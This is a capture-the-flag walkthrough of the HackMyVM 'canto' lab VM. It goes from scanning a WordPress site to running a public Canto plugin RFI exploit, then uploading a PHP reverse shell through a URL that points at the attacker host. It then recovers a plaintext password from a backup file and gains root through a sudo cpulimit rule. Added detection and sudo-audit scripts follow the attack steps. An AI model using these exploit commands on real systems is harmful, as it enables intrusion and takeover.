HackMyVM-canto-Walkthrough
城南花已开 Lv6

Information Gathering

Service Detection

Port 80 is open

sudo arp-scan -l
[sudo] password for ctf:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.129 08:00:27:0f:3d:b4 (Unknown)
192.168.60.254 00:50:56:fd:82:05 (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.952 seconds (131.15 hosts/sec). 4 responded
❯ ip=192.168.60.129
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Making sure 'closed' isn't just a state of mind.

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.129:22
Open 192.168.60.129:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-01 15:38 CST
Initiating ARP Ping Scan at 15:38
Scanning 192.168.60.129 [1 port]
Completed ARP Ping Scan at 15:38, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:38
Completed Parallel DNS resolution of 1 host. at 15:38, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:38
Scanning 192.168.60.129 [2 ports]
Discovered open port 22/tcp on 192.168.60.129
Discovered open port 80/tcp on 192.168.60.129
Completed SYN Stealth Scan at 15:38, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.60.129
Host is up, received arp-response (0.00032s latency).
Scanned at 2025-01-01 15:38:37 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:0F:3D:B4 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Rather than opening it in a browser, scan it with whatweb first. It is clearly a WordPress CMS.

❯ whatweb $ip
http://192.168.60.129 [200 OK] Apache[2.4.57], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.57 (Ubuntu)], IP[192.168.60.129], MetaGenerator[WordPress 6.7.1], Script[importmap,module], Title[Canto], UncommonHeaders[link], WordPress[6.7.1]

Scan it directly with wpscan

❯ wpscan --url http://$ip -e vp --api-token "replace with your own API token"
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.27
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.60.129/ [192.168.60.129]
[+] Started: Wed Jan 1 15:40:39 2025

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.57 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.60.129/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.60.129/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.60.129/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.60.129/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.7.1 identified (Latest, released on 2024-11-21).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.60.129/index.php/feed/, <generator>https://wordpress.org/?v=6.7.1</generator>
| - http://192.168.60.129/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.7.1</generator>

[+] WordPress theme in use: twentytwentyfour
| Location: http://192.168.60.129/wp-content/themes/twentytwentyfour/
| Last Updated: 2024-11-13T00:00:00.000Z
| Readme: http://192.168.60.129/wp-content/themes/twentytwentyfour/readme.txt
| [!] The version is out of date, the latest version is 1.3
| [!] Directory listing is enabled
| Style URL: http://192.168.60.129/wp-content/themes/twentytwentyfour/style.css
| Style Name: Twenty Twenty-Four
| Style URI: https://wordpress.org/themes/twentytwentyfour/
| Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
| Author: the WordPress team
| Author URI: https://wordpress.org
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.60.129/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.1'

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 2
| Requests Remaining: 23

[+] Finished: Wed Jan 1 15:40:43 2025
[+] Requests Done: 35
[+] Cached Requests: 5
[+] Data Sent: 8.487 KB
[+] Data Received: 123.155 KB
[+] Memory used: 245.793 MB
[+] Elapsed time: 00:00:03

It does not seem to have any obvious vulnerabilities, so all I could do was search for the site title together with WordPress, and found the following.

User Privilege Escalation

Canto is a WordPress plugin, and it has file inclusion and RCE vulnerabilities.


Let's try to exploit it

❯ searchsploit canto
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
NetScanTools Basic Edition 2.5 - 'Hostname' Denial of Service (PoC) | windows/dos/45095.py
Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated) | multiple/webapps/49189.txt
Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE) | php/webapps/51826.py
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
~ 15:53:55
❯ searchsploit -m php/webapps/51826.py
❯ python3 51826.py
usage: 51826.py [-h] -u URL [-s SHELL] -LHOST LOCAL_HOST [-LPORT LOCAL_PORT] [-c COMMAND] [-NC_PORT NC_PORT]
51826.py: error: the following arguments are required: -u/--url, -LHOST/--local_host
usage: 51826.py [-h] -u URL [-s SHELL] -LHOST LOCAL_HOST [-LPORT LOCAL_PORT] [-c COMMAND] [-NC_PORT NC_PORT]

Script to exploit the Remote File Inclusion vulnerability in the Canto plugin for WordPress - CVE-2023-3452

options:
-h, --help show this help message and exit
-u URL, --url URL Vulnerable URL
-s SHELL, --shell SHELL
Local file for web shell
-LHOST LOCAL_HOST, --local_host LOCAL_HOST
Local web server IP
-LPORT LOCAL_PORT, --local_port LOCAL_PORT
Local web server port
-c COMMAND, --command COMMAND
Command to execute on the target
-NC_PORT NC_PORT, --nc_port NC_PORT
Listener port for netcat

Examples:
- Check the vulnerability
python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33

- Execute a command
python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -c 'id'

- Upload and run a reverse shell file. You can download it from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php or generate it with msfvenom.
python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -s php-reverse-shell.php

After reading the usage, simply upload a reverse shell

❯ python3 51826.py -u http://192.168.60.129 -LHOST 192.168.60.100 -s php-reverse-shell.php
invalid local port NoneLocal web server on port 8080...

Exploitation URL: http://192.168.60.129/wp-content/plugins/canto/includes/lib/download.php?wp_abspath=http://192.168.60.100:8080&cmd=whoami
192.168.60.129 - - [01/Jan/2025 16:02:05] "GET /wp-admin/admin.php HTTP/1.1" 200 -
-------------------------------------------------------------------
❯ pwncat -l 4444
id
Linux canto 6.5.0-28-generic #29-Ubuntu SMP PREEMPT_DYNAMIC Thu Mar 28 23:46:48 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
08:02:04 up 29 min, 0 user, load average: 0.06, 0.03, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
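As an added defensive example (not part of the original walkthrough or the exploit script), the following Python flags the shape of the exploitation URL shown above in Apache access logs: a request under `/wp-content/plugins/canto/` whose `wp_abspath` parameter points at a remote URL. The sample log lines and client addresses are constructed; the check only relies on the plugin path and parameter names visible in this box.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

CANTO_PREFIX = "/wp-content/plugins/canto/"
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def is_canto_rfi(target: str) -> bool:
    """True when a request under the Canto plugin carries a remote wp_abspath."""
    parts = urlsplit(target)
    if not parts.path.startswith(CANTO_PREFIX):
        return False
    # parse_qs percent-decodes, so wp_abspath=http%3A%2F%2F... is caught too.
    for value in parse_qs(parts.query, keep_blank_values=True).get("wp_abspath", []):
        if value.strip().lower().startswith(REMOTE_SCHEMES):
            return True
    return False


def scan_access_log(lines):
    """Return (client_ip, request_target, cmd) for every matching request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_canto_rfi(m["target"]):
            cmd = parse_qs(urlsplit(m["target"]).query).get("cmd", [""])[0]
            hits.append((m["ip"], m["target"], cmd))
    return hits


# Constructed sample log: a benign request, the URL from this walkthrough, a
# percent-encoded variant, and a Canto request without wp_abspath.
SAMPLE_LOG = [
    '192.168.60.50 - - [01/Jan/2025:16:01:00 +0000] "GET /index.php/feed/ HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '192.168.60.100 - - [01/Jan/2025:16:02:05 +0000] "GET /wp-content/plugins/canto/includes/lib/download.php'
    '?wp_abspath=http://192.168.60.100:8080&cmd=whoami HTTP/1.1" 200 512 "-" "python-requests/2.31"',
    '10.0.0.5 - - [01/Jan/2025:16:03:11 +0000] "GET /wp-content/plugins/canto/includes/lib/download.php'
    '?wp_abspath=HTTP%3A%2F%2F10.0.0.5%3A8000&cmd=id HTTP/1.1" 200 512 "-" "curl/8.5.0"',
    '192.168.60.50 - - [01/Jan/2025:16:04:00 +0000] "GET /wp-content/plugins/canto/includes/lib/download.php?id=5 HTTP/1.1" 404 200 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, target, cmd in scan_access_log(SAMPLE_LOG):
        print(f"[ALERT] Canto RFI attempt from {ip} cmd={cmd!r}: {target}")
```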

A notes hint can be found in the user's home directory

$ cat D*
On the first day I have updated some plugins and the website theme.
I almost lost the database with my user so I created a backups folder.

This indicates that a backup file was created

$ find / -name *backup* 2>/dev/null
-------------(omitted)
/var/wordpress/backups
$ cd /var/wordpress/backups
$ ls
12052024.txt
$ cat 12*
------------------------------------
| Users | Password |
------------|----------------------|
| erik | th1sIsTheP3ssw0rd! |
------------------------------------

Root Privilege Escalation

Connect via SSH

❯ ssh erik@192.168.60.129
The authenticity of host '192.168.60.129 (192.168.60.129)' can't be established.
ED25519 key fingerprint is SHA256:jRCgzH5SXuNm8Cv3PUWt4FXgI74f7392+2lVl33dL2g.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.129' (ED25519) to the list of known hosts.
erik@192.168.60.129's password:
Welcome to Ubuntu 23.10 (GNU/Linux 6.5.0-28-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro

System information as of Wed Jan 1 08:11:08 AM UTC 2025

System load: 0.04 Processes: 107
Usage of /: 43.4% of 8.02GB Users logged in: 0
Memory usage: 16% IPv4 address for enp0s3: 192.168.60.129 Swap usage: 0%


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sun May 12 17:19:50 2024 from 192.168.1.163
erik@canto:~$ cat user.txt
d41d8cd98f00b204e9800998ecf8427e
erik@canto:~$ erik@canto:~$ sudo -l
Matching Defaults entries for erik on canto:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty

User erik may run the following commands on canto:
(ALL : ALL) NOPASSWD: /usr/bin/cpulimit

We find a sudo privilege

Simply use this cpulimit entry to escalate privileges

erik@canto:~$ sudo /usr/bin/cpulimit -l 100 -f /bin/bash
Process 1671 detected
root@canto:/home/erik# id
uid=0(root) gid=0(root) groups=0(root)
root@canto:/home/erik# cat /root/root.txt
1b56eefaab2c896e57c874a635b24b49
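As an added defensive check (not part of the original walkthrough), the following Python parses `sudo -l` output and reports rules that hand out arbitrary program execution, the way the `NOPASSWD: /usr/bin/cpulimit` rule above does via `cpulimit -f`. The embedded sample is the rule from this box plus one constructed second line, and the list of execution-capable binaries is an assumed starter set rather than a complete catalogue.

```python
import re
from os.path import basename

# Starter list of binaries whose sudo rule effectively grants arbitrary execution.
# cpulimit is the case on this page ('-f <program>' runs the program as root);
# the rest are well-known examples, and a real audit would use a larger list.
EXEC_CAPABLE = {
    "cpulimit": "-f <program> runs the program with the rule's privileges",
    "find": "-exec runs an arbitrary command",
    "vim": "can spawn a shell from the editor",
    "less": "can spawn a shell from the pager",
    "env": "executes the given program",
}

# One 'sudo -l' permission line: "(runas) [TAG: ...] cmd1, cmd2"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$")


def audit_sudo_l(output: str):
    """Return (runas, nopasswd, command, reason) for each risky rule in sudo -l output."""
    findings = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # headers and Defaults entries do not start with "(runas)"
        nopasswd = "NOPASSWD:" in m["tags"]
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            if not cmd:
                continue
            if cmd == "ALL":
                findings.append((m["runas"], nopasswd, cmd, "unrestricted command set"))
                continue
            # Rules with fixed arguments are still reported: sudoers argument
            # matching is easy to get wrong, so they deserve manual review.
            prog = basename(cmd.split()[0])
            if prog in EXEC_CAPABLE:
                findings.append((m["runas"], nopasswd, cmd, EXEC_CAPABLE[prog]))
    return findings


# Sample input: the sudo -l output from this box, plus one constructed rule.
SAMPLE_SUDO_L = r"""
Matching Defaults entries for erik on canto:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User erik may run the following commands on canto:
    (ALL : ALL) NOPASSWD: /usr/bin/cpulimit
    (root) /usr/bin/systemctl restart apache2, /usr/bin/find /var/log -name *.gz
"""

if __name__ == "__main__":
    for runas, nopasswd, cmd, reason in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"[RISK] ({runas}) {'NOPASSWD ' if nopasswd else ''}{cmd}: {reason}")
```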